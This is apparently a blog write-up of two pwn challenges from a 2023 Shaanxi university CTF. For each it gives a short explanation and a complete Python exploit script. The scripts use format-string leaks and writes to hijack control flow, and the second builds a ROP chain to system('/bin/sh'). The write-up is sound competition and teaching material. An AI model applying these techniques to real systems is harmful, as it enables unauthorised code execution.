526互联

2023年第三届陕西省大学生网络安全技能大赛-pwn-may be all

发布时间 2023-06-04 13:02:38作者: 7resp4ss

2023年第三届陕西省大学生网络安全技能大赛-pwn-may be all?

前言

校队丢了两道题给我,看了看都是简单题,简单做了做。不知道具体叫什么名,就用pwn1、pwn2代替了。

pwn1

简单的格式化字符串泄露,除了远程docker的变量偏移不一样之外,没什么好说的。(出题人的docker可能有问题

#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-06-03 13:55:30
Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''

from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

sla('choice :','2')
sla('Terra_Cotta_Warriors\n','%19$p')
leak_elf = int(rl()[:-1],16)
leak_ex2(leak_elf)
eb = leak_elf - elf.sym.main
leak_ex2(eb)
sla('choice :','1')
sl(flat(
    {
        40:eb + 0x129a
    }
))

ia()

pwn2

简单的格式化字符串。改rbp链,然后考虑i变量与libc start main的返回地址在同一页的时候不断更改变量i的值以及在libc start main上写rop链。最后还原rbp即可。(现在仔细想想其实利用bss和修改rbp可以直接栈迁移到bss段上,这样好像会方便一点?

#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-06-03 14:06:17
Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''

from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

def attack_8_bits(val,attack_addr,i_addr):
    for i in range(6):
        pd = flat(
        {
            0:'%'+str(attack_addr+i&0xff)+'c'+'%8$hhn',
            0x40:''
        },filler = '\x00'
        )
        sa('say?\n',pd)
        pd = flat(
        {
            0:'%'+str(val&0xff)+'c'+'%10$hhn',
            0x40:''
        },filler = '\x00'
        )
        sa('say?\n',pd)
        sleep(0.05)
        pd = flat(
        {
            0:'%'+str(i_addr&0xff)+'c'+'%8$hhn',
            0x40:''
        },filler = '\x00'
        )
        sa('say?\n',pd)
        pd = flat(
        {
            0:'%10$n',
            0x40:''
        },filler = '\x00'
        )
        sa('say?\n',pd)
        val = val >> 8


pd = flat(
    {
        0x0:'TokameinE_is_the_best_pwner\x00\x00'
    },filler = '\x00'
)
sa('is?\n',pd)


pd = flat(
    {
        0:'%29$p-%8$p-',
    }
)
sa('say?\n',pd)
sleep(0.05)
leak_libc = int(ru('-')[:-1],16)
leak_ex2(leak_libc)
lb = leak_libc - 0x20840
libc.address = lb
leak_ex2(lb)
leak_stack = int(ru('-')[:-1],16)
leak_ex2(leak_stack)
attack_stack = leak_stack + 0x98
ori_ebp = leak_stack + 0x90
i_addr = leak_stack - 0x14

pop_rdi = CurrentGadgets.pop_rdi_ret()
attack_8_bits(pop_rdi,attack_stack,i_addr)
attack_8_bits(CurrentGadgets.bin_sh(),attack_stack+8,i_addr)
attack_8_bits(libc.sym.system,attack_stack+0x10,i_addr)


pd = flat(
{
    0:'%'+str(ori_ebp&0xff)+'c'+'%8$hhn',
    0x40:''
},filler = '\x00'
)
sa('say?\n',pd)
for i in range(12):
    sa('say?\n',p64(0xdeadbeef))
ia()